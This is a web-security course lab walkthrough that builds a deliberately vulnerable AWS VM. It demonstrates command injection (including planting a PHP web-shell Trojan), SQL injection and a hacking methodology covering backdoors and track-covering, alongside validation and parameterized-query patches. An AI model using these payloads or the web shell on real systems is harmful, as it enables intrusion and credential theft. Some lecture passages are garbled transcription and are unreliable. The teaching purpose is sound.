Coursera Assignment Steps


About this Course

Objective :

1. You will learn how to hack web apps with command injection vulnerabilities in a web site
of your AWS Linux instance.
2. You will learn how to search for valuable information on a typical Linux system with LAMP
services, and how to deposit and hide Trojans for future exploitation.
3. You will learn how to patch these web apps with input validation using regular
expressions.
4. You will learn a security design pattern that avoids introducing injection vulnerabilities:
validate input and replace generic system calls with specific function calls.
5. You will learn how to hack web apps with SQL injection vulnerabilities and retrieve user
profile information and passwords.
6. You will learn how to patch them with input validation and SQL parameter binding.
7. You will learn the hacking methodology, the Nessus tool for scanning vulnerabilities, Kali
Linux for penetration testing, and the Metasploit Framework for gaining access to vulnerable
Windows systems, deploying a keylogger, and performing remote VNC server injection.
8. You will learn security in memory systems and the virtual memory layout, and understand
buffer overflow attacks and their defenses.
9. You will learn how to clone a Kali instance with AWS P2 GPU support and perform
hashcat password cracking using dictionary attacks and known-pattern mask attacks.

Ex 1: How to hack web apps with command injection vulnerabilities in a web site of your AWS Linux instance

Command injection is a type of attack in the injection category, where operating system
commands are injected by hackers as part of the input and executed by a program, typically
on a web server.

Command injection occurs when the program does not perform proper input validation.
Input validation is the important technique here: it is a general technique, and it is also the
defense.

The input from the users is used directly or, very importantly, indirectly most of the time as
a parameter to operating system command functions.

For example, the program may call exec or system to send a confirmation e-mail or
notification e-mail, or to create a directory to host user-submitted data in an upload
scenario.

The consequence of a command injection vulnerability is that it allows attackers to run
arbitrary OS commands on the victim machine. The victim machine can be hijacked to attack
others and to perform any operation the hacker desires. Local passwords and credentials,
such as credit card information, can be stolen and searched easily once there is a command
injection vulnerability.

Injection was listed as the number one vulnerability and application security threat in
OWASP's (Open Web Application Security Project) Top 10 in 2012 and still in 2017. OWASP is
a wonderful organization that creates a thriving global community driving the visibility and
evolution of the safety and security of the world's servers.

Demo of command injection attacks on a registration website

The URL of the website is https://cs591x.csnet.uccs.edu/reg.php.
Note that this is a server running behind the UCCS firewall, so you cannot reach it. However,
the virtual machine you are going to clone on AWS has the same content and allows you to
perform the command injection against the web server, similar to what is described here.

So let us create a VM in AWS.


1. Open the AWS management console
2. Create a new instance: click Launch instance
3. Select Community AMI

4. Search for CS5910

5. Choose instance type: t2.micro
6. Click Configure instance details

7. Select subnet “1a”

8. Click Add storage

9. Click Add tags

10. Click Configure security group
By selecting My IP as the source, we get our own IP address; copy that.

Change the source to Custom and paste the IP address.

Likewise add rules for HTTP and HTTPS and paste the same IP address.

11. Click “review and launch”


12. Click “launch”
13. Click Create new key pair

14. Download key pair


15. Click launch instances

16. We could see the screen


17. Click view instances

18. We could see


19. Select the instance so that we can see the instance details

20. Copy the public IP address


21. Paste it in the browser
22. Go to puttygen

23. Click Puttygen


24. Select conversions

25. Click import key


26. Select the .pem file and click Open

27. Enter key passphrase


28. Click “save private key”

29. Give the key name and save


30. Click putty

31. Select session


32. Copy the public ip address in aws instance.

33. Paste it in putty


34. Select connection->Data

35. Type auto-login username as “ec2-user”


36. Select SSH in connection

37. Click “Auth”


38. Click browse

39. Choose the private key and click Open


40. We could see

41. Select session


42. Type “ec2-user” in Saved Sessions

43. Click save


44. Select “ec2-user” and click open
45. Click Accept

46. Enter the passphrase and press the Enter key


47. Enter the command “sudo yum update”
48. Create a directory

49. Get into the directory


50. ls

51. Download the website content:

wget http://ciast.uccs.edu/coursera/pub/csr591.tbz
52. Extract the archive:
tar jxf csr591.tbz

53. ls
Once the archive is extracted and the www folder is copied to /var, we can access the front
page:
sudo cp -r www /var/
54. Check the content of the www folder:
cd www
ls

We can access all the PHP and HTML pages, because all the HTML and PHP files are inside the
html folder, which is inside the extracted www folder.

Ex:
http://13.126.44.109//CS526S2012midterm.html

http://13.126.44.109//CS526S2012midterm.php
http://13.126.44.109//info.php

http://13.126.44.109//phpinfo.php
http://13.126.44.109//regCorrect.php

http://13.126.44.109//register.php
Now I want to do a new registration with student
Name: kalai, student UFP
login: selvi, Confirm student UFP login: kalai, student SID without
dash: 666777888.

Enter the details and click “Register”.

Registration failed.
Try to upload a file sh7.php at http://13.126.44.109//upload.php

Could not upload.


Check the access rights of the folders and files:
ls -l

Try http://13.126.44.109//CS526S2012midterm.php with
chow, chow, #a88,
scroll down, answer all the questions, then click “submit”.
Chow can submit the form. Now check whether the submitted form details are stored in the
CS526/CS5262012midterm directory.
The URL of the response web page shows the web form input is processed by midterm.cgi, a
Perl server-side script in the cgi-bin directory.

To set up the upload report web app and the AWS key retrieval web app, execute the following
commands to allow the credential files to be read by Apache.
For that, the www folder must be copied to /var.

55. Copy it to /var:

sudo cp -r www /var/
If an error occurs, check where you are:
cd www
ls
cd html
ls

cd
cd proj

Type this command (do not copy and paste it):

sudo cp -r www /var/

Once the www folder is copied into /var,
get into the html folder:

cd /var/www/html

ls

Now try to register


Check the access rights:
ls -l
In the output above we observe that the root user owns midterm, gsc and studentproj. But
Apache needs rights to them, so

change the owner of the 3 folders “midterm”, “gsc”, “studentproj” (change ownership recursively on
all files and directories to apache:apache):
sudo chown -R apache:apache midterm gsc studentproj

change the mode (7 means the user has read, write and execute permission, 5 means the group
has read and execute permission, 5 means others have read and execute permission):
sudo chmod -R 755 midterm gsc studentproj
ls -l

Now we can see the user name apache against midterm, gsc and studentproj.

56. Go to the browser and paste: http://3.110.54.185/CS526S2012midterm.php

note: 3.110.54.185 is the public IP address copied from the AWS instance

57. Type chow, chow, #a88 and press Enter

If we try to enter unregistered user login credentials we get the message “Login not correct”.
Ex: enter kalai, kalai, hai
Again go back.
Enter chow, chow, #a88, then press Enter.
You will get the following response web page.

The URL of the response web page shows the web form input is processed by midterm.cgi, a
Perl server-side script in the /var/www/cgi-bin directory.

Log in to your instance to see if an answer file is created in the
/var/www/html/midterm/CS526/CS5262012midterm directory.
Yes, it is created.
To set up the upload report web app and the AWS key retrieval web app, execute the following
commands to allow the credential files to be read by Apache.

58. Go back to PuTTY.

To change the mode to give rights to all the txt files in the “data” folder, type:

sudo chmod 755 /var/www/data/*.txt

59. To change the mode to give rights to all the csv files in the “data” folder, type:
sudo chmod 755 /var/www/data/*.csv

60. Type http://3.110.54.185/upload.php in the browser.

(By using the URL we are visiting different pages of the same website, for example the
upload page.)

61. Save a file with the name “hai” as an image file on the desktop, select that file and click
Send file. As the login is correct, it allows a file to be uploaded.
The URL of the response web page shows the web form input is processed by the upload.php
script in the /var/www/html directory.
Now let us explore the web page that allows a project group to retrieve their AWS Access
Key and Secret Key based on their login/password credentials. Type http:///keyaccess.html
and you will see the following web page. Hit the “retrieve keys” button.

62. Type http://ip/keyaccess.html

The URL of the response web page shows the web form is processed by vul.py, a Python script
in the /var/www/cgi-bin directory.

From this we can say that all three web apps, midterm.php, upload.php and keyaccess.php,
are working.

The /reg web page takes in the fields shown in the web page below:
full name, email, password, and then the [INAUDIBLE] value of the membership
applicant.
When the user fills in this information and clicks on the Register button, the web form data
is submitted to the web server for processing.
The data is saved in the database and an email is also sent to the user's email address,
so they know that the registration is approved and, through the provided link, they can
access the member-specific web pages.
The system admin will then look at the application and try to approve the membership.
That is the setup for this particular web app.

Here we show that the hacker can attach a malicious Unix command, &ls&, just four
characters, right after the typical email entry. The Register button is then clicked. So from
this demo you can tell your friends that the smallest example of command injection is four
characters.

COMMAND INJECTION ATTACKS:

63. Type the following

http://13.126.44.109//keyaccess.html

In the login field enter csnet&ls& and click “retrieve keys”.

If we examine the content of /var/www/cgi-bin on your instance, you will find the same list.
This is because the command was executed by the vul.py Python server-side script in its own
directory: &ls& shows the directory content of /var/www/cgi-bin.

So we could get the directory content by using the malicious string &ls&. To verify this we can
go into the cgi-bin directory in PuTTY.

Treasure Hunt

1. &cat passwd&
To view the content of the passwd file.

Now we can see the passwords of all the users. Ex: jupchurc:#a38
Now I could log in as jupchurc (after identifying the passwords) on the page
http://3.110.54.185/CS526S2012midterm.php
/var/www/html/ is the Apache web document root directory; it hosts a lot of directories. If we
were to leave behind some Trojan files, we would need a directory where the Apache web
server can both read and write.

2. If we want to know the access rights of all the users, we can use the OS command &ls -al
../html& in the web page http://3.108.41.212//keyaccess.html
Highlighted is one of the directories, midterm, that the Apache account can write to.

To list all the files with owner names:

&ls -l&
&ls -al&
To view the content of the vulpy.txt file:

&cat vulpy.txt&
HACKING MIDTERM WEB APP:
Given that we know the /var/www/html/midterm directory is writable through the command
injection, and that vul.py is executed in /var/www/cgi-bin/,
we come up with the following malicious string.
The echo > command allows us to write a one-line PHP script (a Trojan file) as a file called
sh6.php; ../html/midterm is a file system navigation maneuver from /var/www/cgi-bin to
/var/www/html/midterm.

Now enter the following malicious string in the login entry right after csnet, in order to add
the file sh6.php to http://ip/midterm:

& echo '<?php passthru($_GET[cmd]); ?>' > ../html/midterm/sh6.php &

http://3.108.41.212/CS526S2012midterm.php
After this is done, verify that sh6.php is in the midterm directory with https:///midterm/
(here http://3.108.41.212/midterm/) to see if sh6.php is there. Try
https:///midterm/sh6.php?cmd=ls to see if it will display the content of the midterm
directory.

Try https:///midterm/sh6.php?cmd=cat ../php/reg.php


Hacking Midterm Web App.

In PuTTY
you must be in the html folder. Otherwise run the command again:
cd /var/www/html/
then
sudo vi /var/www/html/hackv2.php

Press the Insert key.

Replace '<?php with '&lt?php
Also replace sh2b.php with sh6b.php

Press the Escape key, then :wq

sudo ls /var/www/html/gsc

Hacking Upload Web App. On your local machine, type “echo '' > sh7.php” to create the sh7.php
file. Note that single quote characters are used to wrap the one-line PHP file. Type it rather
than copying and pasting it, because the word processor may use different quote characters.
http://3.108.41.212//upload.php

Choose sh7.php

Click “send file”

Type http://<IP>/hackv2.php. Visit any text input, hit Enter.

http://ip/keyaccess.html must be used with the command & echo “> ../html/midterm/sh6.php &
Now enter chow,chow,#a88 in http://3.108.41.212//hackv2.php
Create a file sh7.php with the content echo '<?php passthru($_GET[cmd]);?>'>sh7.php
Choose the file sh7.php to upload.
Note that the malicious file was accepted (surprise!) and saved in

http://13.127.137.113/gsc/master/jgray/doc/sh7.php?cmd=ls
--END--
Now let's see what the HTTP response coming back looks like. We see a long list of files right
in the middle there, starting with a counters PHP file, action.php and so on.

They are returned, followed by the original greeting and status messages.
It turns out that all of this middle part is the file listing of the directory /var/www/html/php,
which is exactly the location of the server-side script that processes the request. It is
located inside the web server's document tree; in this case see CS 591 x [email protected].
We also see that &ls& is included in the mail command, which is echoed.
Normally you shouldn't print out the mail command, or any command, in your server-side
script, but here it is for demonstration purposes.
It turns out that by adding this right after the email entry we can display the content of
/var/html.
Basically, what we are saying is that you can change the OS command to other, more
surprising commands, and they will be executed.
And the dot dot in ls .. means go to the parent directory of /var/www/html/php, which is
this one.
Basically, we can now navigate through the file system on the victim's web server as long as
we have the privilege.
In our case, the server-side script reg.php is run by the account apache, so as long as apache
can read and execute a directory you can display and navigate through it.
If apache doesn't have execute or read permission on a directory, we will not get any result
coming back; we cannot display those with this attempt.
But still, any of the web directories can be displayed, since apache needs to be able to read
them.
How about if you would like to display action.php? Well, very simple.
Just do cat, space, action.php, prefix it with an ampersand sign and postfix it with an
ampersand sign, and submit it through the web page. Now you are going to see the content of
action.php. Normally, for a PHP script, we don't want to reveal its source, only the HTML
execution result, but you are going to see very valuable information coming back. I will let
you try it and maybe discuss with your classmates in this MOOC: what other critical
credential information was revealed inside action.php? Here we show it by replacing &ls& with
&cat ../../cgi-bin/passwd&. By doing that, when we enter and submit, we are able to display
the content of the password file right in the middle there. You can see a typical password
file format: the login name, followed by the colon separator, followed by the password
string, in this case unfortunately in plain text, pound sign something. Okay, so it is very
revealing: using cat you can see the content and then capture a lot of information on the
web server side.
So we have just demonstrated that we can run any OS command on the victim site and
navigate up and down in the file system.

SQL Injection Attack

Discussion on

• SQL injection impact,
• SQL injection - the source of this vulnerability,
• how the password information in a database can be revealed by injecting a logical
expression into a SQL statement via the input data, bypassing or overriding the condition
checking in SQL commands.

SQL injection is a type of injection application vulnerability attack where SQL commands
or related logical expressions are injected by the hackers as part of the input and executed
by the SQL server.
It results in revealing sensitive data, such as passwords and credit card numbers, in the SQL
database.
It occurs when the program does not perform the input validation we saw in the command
injection case.
The input from the users is used directly or indirectly as a parameter to the later SQL
queries.
The SQL injection vulnerability allows the attacker to modify and execute SQL queries on
the victim's actual server.
The hacker can steal and create fake password and credential information inside the victim
database. They can steal or forge other critical information inside the database, as with
command injection.
In the same category of injection vulnerability, SQL injection is number 1 in the OWASP
Top 10 Vulnerabilities 2013. It remains number 1 in the OWASP Top 10 Application Security
Risks, which will probably be published in August 2017.

Unlike command injection, SQL injection focuses on attacking the SQL server, and therefore
it cannot execute arbitrary OS commands.
Personally I feel it's less dangerous, but critical information can still be revealed.
The MySQL server, which here runs on Linux, maintains its own password file in a MySQL
database: the specific database called mysql, inside its user table, a table with the name
USER.

These are different from the passwords maintained by the operating system, typically in
/etc/shadow on a Linux system.
However, for convenience or for [LAUGH] laziness reasons, if the system administrator is too
lazy, often the login and password created are exactly the same.
The hacker can then log in.
If they break into a database and retrieve this credential information, they can then log in
to the victim's system. This is called escalating privilege.
You steal credentials from one area of the services, and you can authorize in another
service. Escalating privilege is one of the important hacking methodology steps.

Here is a demo of a SQL injection attack using a typical Membership Profile Request web app.
First, let us show the normal operation.
sudo yum update
Download the website content http://ciast.uccs.edu/coursera/pub/csr591.tbz:
wget http://ciast.uccs.edu/coursera/pub/csr591.tbz

Extract the files:

tar jxf csr591.tbz
First verify that the MySQL server is up and running, by using the command
ps aux | grep mysqld
or

nmap localhost

If mysqld is not running, then you can start it with
sudo service mysqld start
Then verify again by running

nmap localhost
Set up the MySQL database account and database tables for the web apps with
vulnerabilities.
First switch to the directory /var/www/data:
cd /var/www/data
Run the following commands to set up the related databases and tables for the SQL injection
exercises:
sudo mysql/createacc.pl cs00net chow "#Uc2013lions$"
sudo mysql -u root -pcs00net chowdb < admin.sql
sudo mysql -u root -pcs00net chowdb < member1.sql
sudo mysql -u root -pcs00net chowdb < cs591.sql

http://3.110.86.19/showme.php
In the Membership Profile Request web app page, we enter the email address and the
password and then we click the Submit button.

If the password check is OK, the status is shown in the activity response web page coming
back.

Here we show the SQL injection exploit of the vulnerability in the Membership Profile
Request web app.

We just add a malicious string: a single quote, the 'or 0=0 or' operator expression, ending
with a single quote.
Now enter ' or 0=0 or ' in Email and Submit it.
If we enter this string right after the email address, we are able to retrieve the profile
information of all the members in this particular database, including the passwords for
accessing the website.

Note that missing the two single quote characters or the last or operator in this malicious
string will not result in the display of that password information.
It's very tricky, but we will explain why later on.

The SQL query will return a SQL syntax error at line one if we're missing those single quotes
or the or operator.

For example, by removing the last or operator, we will have 0=0 followed by a single quote at
the end of the SQL statement, where 0 followed by a quote is not a legal term in a SQL
statement.
Therefore, SQL query processing will reject it and print out a syntax error.

Let's examine the showme.php code to understand where the SQL injection vulnerability
occurs.

First, looking at the pattern of the code, we can spot that it violates the security design
pattern discussed in the previous session: it does not check the input right after reading in
the input data, as shown by the arrow there.
Furthermore, the input email is used directly in the SQL query.
The query also uses star, the wildcard character, to display all the fields in the table, and
that should be changed to make it more specific.
For example, instead of showing the password, we should probably require a special request
before we show the password. Remember the paradigm of replacing a generic mechanism
with a specific mechanism: the more specific, the better the security.
Here we examine how the SQL query with the malicious string is evaluated.
By turning on the print debugging statements in showme.php, we get the following query
printout, which shows the 'or 0=0 or' malicious string injected into the SQL query, as shown
in the middle there.

The where clause has three expressions altogether, and we highlight the malicious string in
red. The three expressions are connected with the or operator. The first expression,
email='[email protected]', is the normal expression that we see in a normal query.
It returns true only for the intended row, and therefore only one row was shown when we
examined all the rows.
The second expression, 0=0, is the malicious attack: as a logic expression it always returns
true.
And because true or any other value is always true, we simply bypass the previous logic
expression, and every row in the database will then be matched and displayed.
The third one is the two single quote characters, an empty string. It doesn't matter in this
case, since the middle logic expression already overrides the whole clause, yielding true for
the entire or expression.

Therefore, in this case, all the row information in the member1 table comes back and is
displayed, and all the columns are displayed too, because we use the wildcard character
star.

Patching Web App with SQL Injection Vulnerability

• In this lesson we patch the membership profile retrieval web app, which has the SQL
injection vulnerability, with two techniques.
• The first one is the Input Validation technique, the other one is the Parameterized
Query technique.

Remember the first rule in Security Design Pattern A, which we presented in the previous
lesson for command injection defense. We observed three sub-patterns:
1. First, always validate the input before performing any program-specific operation, right
after we read in the input.
2. Second, validate the input data using regular expressions so as to detect the malicious
string.
3. Third, exit right away once we detect the malicious string or code.
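As an added example (not code from the course or from its vul.py script), here is what the three sub-patterns of Security Design Pattern A look like in Python for a key-retrieval lookup like the keyaccess web app: the login is validated with an allowlist regular expression right after it is read, the program exits at once when it does not match, and the generic shell command is replaced by a specific file read in the program itself. The keys.txt format, the grep command line shown in the unsafe helper and the LOGIN_RE pattern are assumptions.

```python
import os
import re
import tempfile

# Allowlist pattern for a group login name (an assumption; the course's vul.py does not
# define one). '&', ';', '|', '$', '`', '/' and whitespace are all outside the set, so a
# four-character injection such as &ls& can never reach a shell.
LOGIN_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def build_shell_command_unsafe(login, keyfile):
    """The vulnerable shape, as a string only (never executed here): the raw login is
    spliced into a shell command line. With login 'csnet&ls&' the shell would run three
    commands, 'grep csnet', 'ls' and 'keys.txt', which is how the cgi-bin listing appeared."""
    return "grep " + login + " " + keyfile


def validate_login(login):
    """Sub-patterns 1-3: validate right after reading the input, use a regular expression,
    and stop immediately when the input does not match."""
    if not LOGIN_RE.match(login):
        raise ValueError("login contains characters outside the allowed set")
    return login


def retrieve_keys(login, keyfile):
    """Specific function call instead of a generic system()/exec(): parse the file in
    Python. No shell ever sees the input, so shell metacharacters have no meaning at all."""
    login = validate_login(login)
    with open(keyfile, encoding="utf-8") as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if len(fields) == 3 and fields[0] == login:
                return {"access_key": fields[1], "secret_key": fields[2]}
    return None  # unknown login: no detail about the file is leaked


def demo_keyfile():
    """Constructed sample credential file with fake keys, written to a fresh temp dir."""
    path = os.path.join(tempfile.mkdtemp(), "keys.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("csnet:FAKE_ACCESS_KEY_1:FAKE_SECRET_1\n")
        fh.write("chow:FAKE_ACCESS_KEY_2:FAKE_SECRET_2\n")
    return path


if __name__ == "__main__":
    keyfile = demo_keyfile()
    print("unsafe command line would be:", build_shell_command_unsafe("csnet&ls&", keyfile))
    print("valid login:", retrieve_keys("csnet", keyfile))
    for bad in ("csnet&ls&", "csnet&cat passwd&", "../html"):
        try:
            retrieve_keys(bad, keyfile)
        except ValueError as err:
            print(repr(bad), "rejected:", err)
```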

Here we have two input validations.

• In an if statement right after we read in the email and password, we validate the email
and password with regular expressions.
• The email regular expression pattern does not allow an equal sign, a space, or a single
quote character to pass through.
Because an email should not contain any of those characters, the malicious string we just
discussed will be detected by that regular expression match, and the true branch will be
executed.
The processing goes to the print statement, prints out the error message,
and then exits without further execution.
Here we show the validation result: the showme defense pb.php script is protected by the
effective input validations.
Even though the input validation can catch most if not all of the errors, here we apply the
defense-in-depth principle by implementing the parameterized SQL query, so that we can
restrict the query execution further.
Here is the idea.

We use a question mark symbol to represent each parameter in the query; thus we limit the
number of variable inputs to the query.
Once the query is prepared, the hacker can no longer add any additional expressions or
query statements into the SQL query.
We then use the bind_param function to bind the parameters.
We use a very specific type (string, number) together with the actual variable, so the
database can double-check that the variable contains a value of exactly that type.
For example, a numerical value is restricted using i; for a double value we use the symbol
d in the first parameter of bind_param; s is for a string and b for a blob object. The query
processing will detect any type mismatch with the value being submitted.
We will use the showme defense pb.php script, which is a modification of showme.php, in
/var/www/html as was mentioned.
• On line 29 we see the $_email variable is replaced by a question mark in the query
statement we formulate.
• On line 34 we see bind_param binding a string type to the variable, because the
$_email variable is a string type.
• On line 42 we use bind_result to return four variables corresponding to very specific
columns, which we return to form the response web page.
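As an added example (not the course's showme.php or its patched version), the following Python script reproduces the vulnerable query construction against a constructed in-memory SQLite table, so the three or-connected expressions of the malicious where clause and the syntax-error caveat from the previous lesson can be seen, and then applies both patches from this lesson: regular-expression input validation with immediate exit, and a parameterized query with a ? placeholder. The member1 column names, the sample rows and the EMAIL_RE allowlist are assumptions; SQLite stands in for MySQL, and its ? placeholder plays the role of mysqli's prepare and bind_param.

```python
import re
import sqlite3

# Constructed sample rows (not the course's member1.sql); the passwords are fake.
SAMPLE_MEMBERS = [
    ("Alice", "alice@example.com", "fake-pw-1"),
    ("Bob", "bob@example.com", "fake-pw-2"),
    ("Carol", "carol@example.com", "fake-pw-3"),
]

# Allowlist pattern (an assumption, stricter than the lecture's deny-list): '=', space and
# the single quote are all outside the allowed set, so the malicious string cannot pass.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# The lecture's malicious string, appended right after a real email address.
PAYLOAD = "alice@example.com' or 0=0 or '"


def open_db():
    """In-memory stand-in for the chowdb.member1 table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member1 (name TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO member1 VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    return db


def build_vulnerable_query(email):
    """showme.php's mistake: the raw email is concatenated into the SQL text, so with
    PAYLOAD the where clause becomes  email='alice@example.com' or 0=0 or ''  (three
    expressions; 0=0 is always true, so every row matches)."""
    return "SELECT name, email, password FROM member1 WHERE email='" + email + "'"


def vulnerable_lookup(db, email):
    """Runs the concatenated query; with PAYLOAD every row, password included, comes back."""
    return db.execute(build_vulnerable_query(email)).fetchall()


def query_is_syntax_error(db, email):
    """The lecture's caveat: drop the trailing 'or' and the statement no longer parses."""
    try:
        db.execute(build_vulnerable_query(email))
        return False
    except sqlite3.OperationalError:
        return True


def validate_email(email):
    """Patch 1, sub-patterns 1-3: validate right after reading, by regex, and exit at once."""
    if not EMAIL_RE.match(email):
        raise ValueError("Invalid email address")
    return email


def parameterized_lookup(db, email):
    """Patch 2: the ? placeholder is bound to the value, which is treated as data and never
    as SQL syntax. The select list is also made specific: no star, no password column."""
    return db.execute("SELECT name, email FROM member1 WHERE email=?", (email,)).fetchall()


def patched_lookup(db, email):
    """Defense in depth: both patches together, as in the patched showme script."""
    return parameterized_lookup(db, validate_email(email))


if __name__ == "__main__":
    db = open_db()
    print(build_vulnerable_query(PAYLOAD))
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))        # all three rows
    print("parameterized:", parameterized_lookup(db, PAYLOAD))  # no row matches
    try:
        patched_lookup(db, PAYLOAD)
    except ValueError as err:
        print("patched:", err)                                  # rejected before any query
```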

Hacking methodology

1. Footprinting

• Hacker will start by surveying and gathering information about the


organization they intend to penetrate and hack into. This step is called
footprinting.

• The right column here show the command we use to obtain those related
information in the internet about the organizations.
• We have whois you can type in most of the nicknacks system and it will return
those critical organization information about administrator and the technical
contact information, how many server, name server, are serving that particular
domain.
• And we also see the netscraft as one of the command. Actually one of the website
that provide a query, allow you to type in a domain name, and it track all of the
Web servers they've used for that organization, over the years; including the
operating system and the version. And we were able to find that information very
valuable.

2. Scanning

Here we use and Nmap command or one of the famous tool called nexus.
• Nmap - Network Mapper. It is an open-source Linux command-line tool that is used to
scan IP addresses and ports in a network and to detect installed applications.
Nmap allows network admins to find which devices are running on their network,
discover open ports and services, and detect vulnerabilities.
• It allows us to find out what other machines within that domain or subnet range,
network adjust range, how many machine are active, how many server are active
and what are the ports which represent the specific service that are open.
• The Nexus too can even instructed it to gather and analyze the operating system
and package and identify the vulnerability listed and even tried to launching the
malicious attack.
3. Enumerations
• It is a process of gathering the information about the target machine by actually
actively connect to it.
• hacker try to identify user, system, admin kind of accounts and try to find out what
the active directory, shared directory that may be open.
• And if there's a web server they will try find out what are the web page that is
available for potential injection attacks.
4. Wiretap
• We can wiretap the network or using the legitimate account to analyze the network
traffics and explore the web page to see if they have command or unsecure injection
vulnerability. This is so called low hanging fruit.
5. Escalating privilege
• With the privilege we established in number four, we then- a hacker will then
perform treasure hunting. We do that by exporting variable directory within the
attackers system.
Ex: the passport file, the script, server site script file, which may have embedded
with some credential information, maybe some configuration file. And try to
gather additional credential passport information and we search directory and
see whether they can read or write or even execute. And see whether we can even
modify the access right or its security token if they are using secure index more
for protection. In case the passport file is readable and the passport maybe
encrypted we can read it out and offline. We use password cracking tool such
as, johntheripper showing here to break into the additional account.
6. Pilferting
• Gathering the information on identify the Mackays to allow access to the trops
system. This including examining the configurations of various network
services. And often they include commands and showing how they are configured.
All they actually contains the credential credit card, passport information such as,
server connection information or very typical for intrusion detection system. They
might including database account for access and deposit detecting malicious
information.
7. Covering the track
• System may including logs or intrusion detection system that monitor and knew
your access or modification of critical, file and directory. Such law breakers, the
hacker may attempt to modify, to hide their track if that is possible.
Note that from previous lesson some operating system will prevent this from
happening by only allow a pen right to the lock.
8. Backdoor
• To allow re-entry sometime in the future, the hacker may create scripts to be
executed by a cron job or an at job at a regular interval. When they execute, they
will examine the remote executables they have deposited and see whether those
still exist.
If they were wiped out by the anti-virus quarantine, these at jobs and cron jobs will put
them back. That is the reason why, from time to time, we see a quarantined virus
reappear. This also shows why a backdoor attack is very important, and why a Trojan
kind of attack is very important to detect.
Once we have been attacked, make sure we search the startup folder, the registry entries,
the at/cron jobs and the configuration files to see whether we have those dangerous
scripts there. Sometimes they will hide those files and scripts with a dot prefix;
that is called a hidden directory or hidden file.
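A defender's check for the scheduled-task backdoor described above, as an added example that is not part of the course material: it audits crontab lines (the sample lines are constructed here) for dot-prefixed hidden paths and for jobs running from temporary directories; the regular expression and the directory list are this example's own choices.

```python
import re

# Constructed sample of what `crontab -l` might return on a compromised host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /home/web/.cache/.sync.sh >/dev/null 2>&1
@reboot /tmp/.x/restore.py
30 2 * * 0 /usr/local/bin/backup.sh
"""

# A dot-prefixed path component (hidden file or directory) in the command.
HIDDEN_COMPONENT = re.compile(r"(?:^|/)\.[^/\s]+")
# Directories that legitimate scheduled jobs rarely run from (example's own list).
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

def parse_cron_line(line):
    """Split a crontab line into (schedule, command); None for comments/blank."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                # @reboot, @daily, ...
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    fields = line.split(None, 5)            # five time fields, then the command
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]

def audit_crontab(text):
    """Return (schedule, command, reasons) for every entry worth a closer look."""
    findings = []
    for line in text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        sched, cmd = parsed
        reasons = []
        if HIDDEN_COMPONENT.search(cmd):
            reasons.append("hidden (dot-prefixed) path")
        if any(d in cmd for d in SUSPECT_DIRS):
            reasons.append("runs from a world-writable temp directory")
        if reasons:
            findings.append((sched, cmd, reasons))
    return findings

if __name__ == "__main__":
    for sched, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{sched:<12} {cmd}\n    -> {', '.join(reasons)}")
```

The same parser can be pointed at /etc/crontab, /etc/cron.d/* and each user's crontab output; the reasons list is where a site adds its own rules.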
9. Denial of service
• Maybe after the weakened machine has been explored for all its treasure and is no
longer useful, sometimes we launch a denial of service attack to shut down the
system. That can also happen when we cannot actually penetrate, and then we
resort to this kind of denial of service attack. It can be done from outside, or from
inside by modifying the configuration of the network routing table and confusing
the system's interior, resulting in incorrect routing or database access. In this case
it is very important for the vendor to back up the files and images. But at the same
time, if the hacker can get access to these backup files and restore images, they will
try to modify them, resulting in a failed disaster recovery process. So backing up in
multiple places is an important step.

Demystify New OS/PL Will Not Have Injection Vulnerabilities


We examine the common misconceptions about vulnerabilities:
• including the claim that systems with newer operating systems will have fewer
vulnerabilities,
• and the same claim for newer programming languages, that they will have fewer
vulnerabilities.
• Will a vulnerability exist on a well-patched machine running the newest operating
system? The answer is yes.
• The command and SQL injection attacks we have successfully demonstrated and
performed were on Linux machines with the most recent Fedora operating system
release, patched with the most recent patches. The operating system, the web
server and the MySQL database were all patched with the most recent patches. We
still see them being attacked. The reason is that this vulnerability does not come
from the operating system libraries or the server. It comes from the applications,
from ill-designed, not properly designed, not well-implemented web
applications.
• A major reason for that is that the web programmer was not trained and educated
in secure software engineering techniques and new, secure design patterns. The
operating system and network libraries, in their most recent patched releases, go
through the best practices of the Linux and network library distributions, and
therefore typically go through very rigorous testing and software scanning. That is
why we see far fewer vulnerabilities in those operating systems and in their
network libraries.
It is not the same case in the application domain. We hire high school kids; we hire
programmers who are not trained in secure coding techniques. Therefore we often
have a high variety of application code coming from different sources, and that
makes screening for this vulnerability very difficult.
• Will the vulnerability exist in a more modern programming language with type-safe
features, such as Python, or maybe Swift, proposed by Apple for iOS? The answer
is yes, they can still occur.
• Here is an example of a web app that provides the AWS access key and secret access
key given an account and password. It is written in Python. Through a keyX@HTML
web page in your Chrome virtual machine, we can enter the login and password in
the input fields and submit them to this Python script in the cgi-bin directory.
The result will be the corresponding access key and secret key returned. This
script is written in the newer Python programming language, but it contains exactly
the same kind of command injection vulnerability we showed using the PHP script,
ig.php. It accepts exactly the same malicious string &ls&, just four characters,
and it will display the contents of the working directory in which the server-side
script resides, which is /var/www/cgi-bin.

What command can we use to display the password file in this directory?
The answer is the cat command: you just say cat followed by the password file name, and
it will show the actual content of the password file in the cgi-bin directory.
Here we show the actual code of the Python server-side script and discuss its
vulnerabilities. Lines 27 through 29 read in the input variables.
We can spot right away, based on the security design pattern, that there is no validation
code for them. We need to see some code with an if statement that contains a
regular expression, and we did not find it there.
Line 59 shows the formatting of the mail command. Here we have three variables,
separated by the ampersand sign.
The last variable is login. If we look at the corresponding formatting string in
front, it actually substitutes the -c parameter of the mail command, which is the carbon
